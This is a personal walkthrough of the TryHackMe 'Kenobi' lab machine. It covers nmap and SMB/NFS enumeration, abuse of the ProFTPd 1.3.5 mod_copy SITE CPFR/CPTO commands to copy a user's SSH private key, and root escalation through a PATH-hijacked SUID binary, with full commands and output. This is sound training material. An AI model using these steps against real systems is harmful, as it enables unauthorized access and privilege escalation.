Kenobi WriteUp
by Zebra
| Room | Date | Difficulty | Type | Time | Own Intention | Machine |
|---|---|---|---|---|---|---|
| Kenobi | 29.10.2020 | Easy | Walkthrought | 1h | Easy | Linux |
Tasks
| Task | Question |
|---|---|
| Task 1.1 | Make sure you’re connected to our network and deploy the machine |
| Task 1.2 | Scan the machine with nmap, how many ports are open? |
| Task 2.1 | Using nmap we can enumerate a machine for SMB shares. |
| Task 2.2 | Once you’re connected, list the files on the share. What is the file can you see? |
| Task 2.3 | What port is FTP running on? |
| Task 2.4 | What mount can we see? |
| Task 3.1 | ProFTP. What is the version? |
| Task 3.2 | How many exploits are there for the ProFTPd running? |
| Task 3.3 | Autocomplete |
| Task 3.4 | We know that the FTP service is running as the Kenobi user and an ssh key is generated for that user. |
| Task 3.5 | What is Kenobi’s user flag (/home/kenobi/user.txt)? |
| Task 4.1 | What file looks particularly out of the ordinary? |
| Task 4.2 | Run the binary, how many options appear? |
| Task 4.3 | Autocomplete |
| Task 4.4 | What is the root flag (/root/root.txt)? |
Introduction
Hello and welcome to the Write-Up of the Room “Kenobi” on tryhackme.
First i make some directories for better structure.
Then I check the Task, which I had to solve.
We see, that with have a little red line to get the user and root flag,
cause this Room is “guided”. That means that we get a lot of hints and commands in the tasks itself.
So let’s begin:
Preparation Steps
Scanning and Enumeration
Lets begin with a simple nmap only Portscan and sort with a grep command
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/thm/kenobi]-[IP:][]-[Target:][10.10.248.210]
└─$ nmap -Pn 10.10.248.210 -oN ./nmap/ports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:10 CET
Nmap scan report for 10.10.248.210
Host is up (0.085s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds
cat ./nmap/ports|grep open | awk -F/ '{print $1}' ORS=','
21,22,80,111,139,445,2049,
Now we can use this little Portscan to scan the Ports fully.
nmap -A -T4 -p 21,22,80,111,139,445,2049 10.10.248.210
Our output shows us the following results:
| Port | Service | Information’s |
|---|---|---|
| 21/tcp | ftp | ProFTPD 1.3.5 |
| 22/tcp | ssh | OPEN SSH 7.2p2 Ubuntu |
| 80/tcp | webserver | Apache 2.4.18 Webserver Ubuntu |
| 111/tcp | rcpbind | rcpbind service |
| 139/tcp | samba | wrgr:WORKGROUP |
| 445/tcp | samba | 4.3.11 - Ubuntu wrgr:WORKGROUP |
| 2049/tcp | nfs_acl | —- |
### Task 1.1 + 1.2 solved ###
Samba Enumeration
I cut some information’s out of the nmap output!
SMB Scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.248.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:21 CET
Nmap scan report for 10.10.248.210
Host is up (0.082s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.248.210\IPC$:
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.248.210\anonymous:
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.248.210\print$:
| Anonymous access: <none>
|_ Current user access: <none>
Inspect SMB shares
1
2
3
4
5
6
7
smbclient //10.10.248.210/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 12:49:09 2019
.. D 0 Wed Sep 4 12:56:07 2019
log.txt N 12237 Wed Sep 4 12:49:09 2019
One textfile found -> download this
Download the file
1
2
3
4
5
6
7
8
9
10
11
12
13
smbget -R smb://10.10.248.210/anonymous
Password for [kali] connecting to //anonymous/10.10.248.210:
Using workgroup WORKGROUP, user kali
smb://10.10.248.210/anonymous/log.txt
Downloaded 11,95kB in 5 seconds
┌──(kali㉿kali)-[~/thm/kenobi]-[IP:][]-[Target:][10.10.248.210]
└─$ la
insgesamt 12K
drwxr-xr-x 1 kali kali 248 30. Okt 09:28 downloads/
drwxr-xr-x 1 kali kali 0 29. Okt 20:23 gobuster/
-rwxr-xr-x 1 kali kali 12K 30. Okt 09:29 log.txt*
drwxr-xr-x 1 kali kali 264 30. Okt 09:05 nmap/
In the log.txt you will get a lot of information’s about the ftp service.
### Task 2.1 - 2.3 solved ###
RCP enumeration
For Task 2.4 we do a little jump to the RPC.
What means RPC:
“This is just an server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.”
https://linux.die.net/man/8/rpcbind
With nmap we can enumerate this service:
1
2
3
4
5
6
7
8
9
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.248.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:37 CET
Nmap scan report for 10.10.248.210
Host is up (0.080s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /*** *
### Task 2.4 solved ###
Exploitation
ProFTP enumeration and exploitation
ProFTPd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.
For the Task 1 use the nmap protocol you saved earlier.
Find some exploits for this
1
2
3
4
5
6
7
8
searchsploit proftp 1.3.5
------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------ ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote CE | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------ ---------------------------------
When you find some interesting things you can take look at the file with:
searchsploit -x linux/remote/36742.txt
Or save the files to your location with:
searchsploit -m linux/remote/37262.rb
More infos about the exploit https://www.cvedetails.com/cve/CVE-2015-3306/
For this task we have to use SITE CPFR and SITE CPTO commands. I never heard about this. so here are my steps:
- Use
nc 10.10.248.210 21 - Checkout the help pate
site help - Get informations out of google.http://www.proftpd.org/docs/contrib/mod_copy.html#SITE_CPFR
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nc 10.10.248.210 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.248.210]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
CPFR <sp> pathname
CPTO <sp> pathname
HELP
CHGRP
CHMOD
214 Direct comments to root@kenobi
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
Lets mount the nfs and copy the id_rsa
Why and what could we mount? We find out in the step before that on port 111/tcp nfs is running and scan this with nmap-scrips. That shows us the mountable drives.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mkdir /mnt/kenobiNFS
mount 10.10.248.210:/var /mnt/kenobiNFS
mount.nfs: failed to apply fstab options
-----> Not reachable cause to has to use "sudo"
sudo mount 10.10.248.210:/var /mnt/kenobiNFS
la /mnt/kenobiNFS
insgesamt 48K
drwxr-xr-x 2 root root 4,0K 4. Sep 2019 backups/
drwxr-xr-x 9 root root 4,0K 4. Sep 2019 cache/
drwxrwxrwt 2 root root 4,0K 4. Sep 2019 crash/
drwxr-xr-x 40 root root 4,0K 4. Sep 2019 lib/
drwxrwsr-x 2 root staff 4,0K 12. Apr 2016 local/
lrwxrwxrwx 1 root root 9 4. Sep 2019 lock -> /run/lock/
drwxrwxr-x 10 root crontab 4,0K 4. Sep 2019 log/
drwxrwsr-x 2 root mail 4,0K 27. Feb 2019 mail/
drwxr-xr-x 2 root root 4,0K 27. Feb 2019 opt/
lrwxrwxrwx 1 root root 4 4. Sep 2019 run -> /run/
drwxr-xr-x 2 root root 4,0K 30. Jan 2019 snap/
drwxr-xr-x 5 root root 4,0K 4. Sep 2019 spool/
drwxrwxrwt 6 root root 4,0K 30. Okt 10:00 tmp/
drwxr-xr-x 3 root root 4,0K 4. Sep 2019 www/
SSH connection with the priv_key
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
cp /mnt/kenobiNFS/tmp/id_rsa .
la
insgesamt 16K
drwxr-xr-x 1 kali kali 248 30. Okt 09:28 downloads/
drwxr-xr-x 1 kali kali 0 29. Okt 20:23 gobuster/
-rw-r--r-- 1 kali kali 1,7K 30. Okt 10:10 id_rsa
-rwxr-xr-x 1 kali kali 12K 30. Okt 09:29 log.txt*
drwxr-xr-x 1 kali kali 264 30. Okt 09:05 nmap/
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.248.210
load pubkey "id_rsa": invalid format
The authenticity of host '10.10.248.210 (10.10.248.210)'
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ cat /home/kenobi/user.txt
### Task 3.1 - 3.5 solved ###
Privilege escalation
SUID Escalation
The Task 4 give us a hint we had to look for SUIDs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$
One of this listed ones is interesting and not normal one.
Exploitations and path change
check out the /usr/bin/menu
1
2
3
4
5
6
7
8
9
10
11
strings /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
With that information we know the commands, which get used by this binary
Thing to do:
- Manipulate the “curl” command with something useful, that runs by root
- change $PATH
- excecute /usr/bin/menu with option “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:/tmp# cat /root/root.txt
When you do PATH changes PLEASE REMEMBER THE OLD one for change it back.
### Task 4.1 - 4.4 solved ###
<h2>What we learned:</h2>
- Nmap simple port scan with get a port list with grep,awk etc…
- Samba enumeration
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse - Samba download
smbget -R smb://10.10.248.210/anonymous - SITE CPFR and SITE CPTO commands
- SUID Priv Escalation